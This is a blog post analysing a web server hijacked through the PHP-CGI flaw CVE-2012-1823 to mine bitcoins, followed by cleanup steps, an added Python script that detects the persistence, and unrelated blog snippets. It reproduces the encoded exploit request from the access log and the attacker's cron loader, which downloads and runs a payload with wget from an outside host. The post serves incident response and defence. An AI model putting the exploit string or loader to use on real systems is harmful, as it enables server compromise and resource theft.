Caffeine, silicon and nimesulide

{ 'fullname' : "Michele Zonca", 'tags' : ['developer', 'mashaper', 'caffeinated', 'nerd']}

Investigating on a server hacked to mine bitcoins

A friend of mine had issues with a web server being very slow and sometimes even unavailable.

When I connected I found a process eating all the CPU time available. It was mining bitcoins.

What I found is that they used this vulnerability, CVE-2012-1823, to execute arbitrary code.

access.log is full of lines like this one:

127.0.0.1 - - [08/Nov/2013:02:28:52 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.0" 504 529 "-" "-"

That request was used to download and execute this script:

# cat /tmp/update
#!/bin/sh
# look for a running process connected to the mining pool
plm=`ps x|grep mine.cc.st:3333|grep -v grep|awk '{print $7}'`
if [ "$plm" != "" ]
then echo "MERGE!!!"
else
# miner not running: fetch the loader again and run it in the background
nohup wget http://update.cc.st/a && sh a >> /dev/null &
fi

Put in crontab, this script checks whether the miner is running and, if it is not, downloads and executes it again: http://pastebin.com/4PVDpkCe

Because the vulnerability was exploited through Apache, the injected code runs as www-data, without real console access and with limited privileges over the file system.

What I did, so far, is to stop the mining process, add update.cc.st to /etc/hosts pointing to localhost, disable /cgi-bin/php on the default domain and clean the file system. Now I will wait for my friend to decide whether she wants to proceed with an update or, better, a complete reinstall.
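To check a box for the persistence described above (a cron entry that re-downloads the miner) and to confirm the /etc/hosts sinkhole, the following Python script is an added example, not code from the post: it flags crontab entries that run from a scratch directory, fetch content at schedule time or name the download host, finds processes whose command line contains the pool address the loader greps for, and verifies that the download host resolves to loopback. The host names and port are the ones quoted in the post; the crontab, process listing and hosts file contents are constructed.

```python
"""Added example (not from the original post): look for the persistence and
network indicators described in the post in a crontab listing, a `ps x`
listing and /etc/hosts.  The host names and port are the ones quoted in the
post; the crontab, process listing and hosts file contents are constructed."""
import re

SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")   # where the loader lived
DOWNLOAD_TOOL = re.compile(r"\b(wget|curl)\b")
POOL_ADDRESS = "mine.cc.st:3333"                       # what the loader greps for
DOWNLOAD_HOST = "update.cc.st"                         # where the loader fetches from

SAMPLE_CRONTAB = """\
# m h dom mon dow command  (constructed sample)
0 3 * * * /usr/bin/apt-get update
*/5 * * * * /tmp/update
"""

SAMPLE_PS = """\
  PID TTY      STAT   TIME COMMAND
  412 ?        Ss     0:00 /usr/sbin/cron
21337 ?        R    512:44 ./a -o mine.cc.st:3333
"""

SAMPLE_HOSTS = """\
127.0.0.1 localhost
127.0.0.1 update.cc.st
"""


def cron_command(line):
    """Return the command part of a crontab line, or '' for comments, blank or malformed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return ""
    if line.startswith("@"):                 # @reboot, @daily, ...
        parts = line.split(None, 1)
        return parts[1] if len(parts) == 2 else ""
    parts = line.split(None, 5)              # five schedule fields, then the command
    return parts[5] if len(parts) == 6 else ""


def suspicious_cron_entries(crontab_text):
    """Return (command, reasons) for entries that run from a scratch directory,
    fetch something at schedule time, or name the known download host."""
    hits = []
    for line in crontab_text.splitlines():
        command = cron_command(line)
        if not command:
            continue
        reasons = []
        if any(d in command for d in SCRATCH_DIRS):
            reasons.append("runs from scratch directory")
        if DOWNLOAD_TOOL.search(command):
            reasons.append("downloads at schedule time")
        if DOWNLOAD_HOST in command:
            reasons.append("references known download host")
        if reasons:
            hits.append((command, reasons))
    return hits


def miner_processes(ps_output):
    """Return (pid, command) for processes whose command line names the pool."""
    found = []
    for line in ps_output.splitlines()[1:]:          # skip the header row
        fields = line.split(None, 4)                 # PID TTY STAT TIME COMMAND
        if len(fields) == 5 and POOL_ADDRESS in fields[4]:
            found.append((fields[0], fields[4]))
    return found


def sinkholed(hosts_text, hostname):
    """True if /etc/hosts maps hostname to a loopback or null address."""
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 2 and hostname in fields[1:]:
            return fields[0] in ("127.0.0.1", "0.0.0.0", "::1")
    return False


if __name__ == "__main__":
    print("cron:", suspicious_cron_entries(SAMPLE_CRONTAB))
    print("miner:", miner_processes(SAMPLE_PS))
    print("sinkholed:", sinkholed(SAMPLE_HOSTS, DOWNLOAD_HOST))
```

On a live system feed it the output of `crontab -l` for www-data (and the files under /var/spool/cron and /etc/cron.*), `ps x`, and /etc/hosts; the hosts-file sinkhole only blocks the name, so a loader that switches to a raw IP address still needs the cron entry and the process itself removed.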

Hurricane on Saturn, via NASA

On Android 4.2 and newer, Developer options is hidden by default. To make it available, go to Settings > About phone and tap Build number seven times. Return to the previous screen to find Developer options.

Daylight Saving time in the World

Comets Lemmon and PanSTARRS Peaking, APOD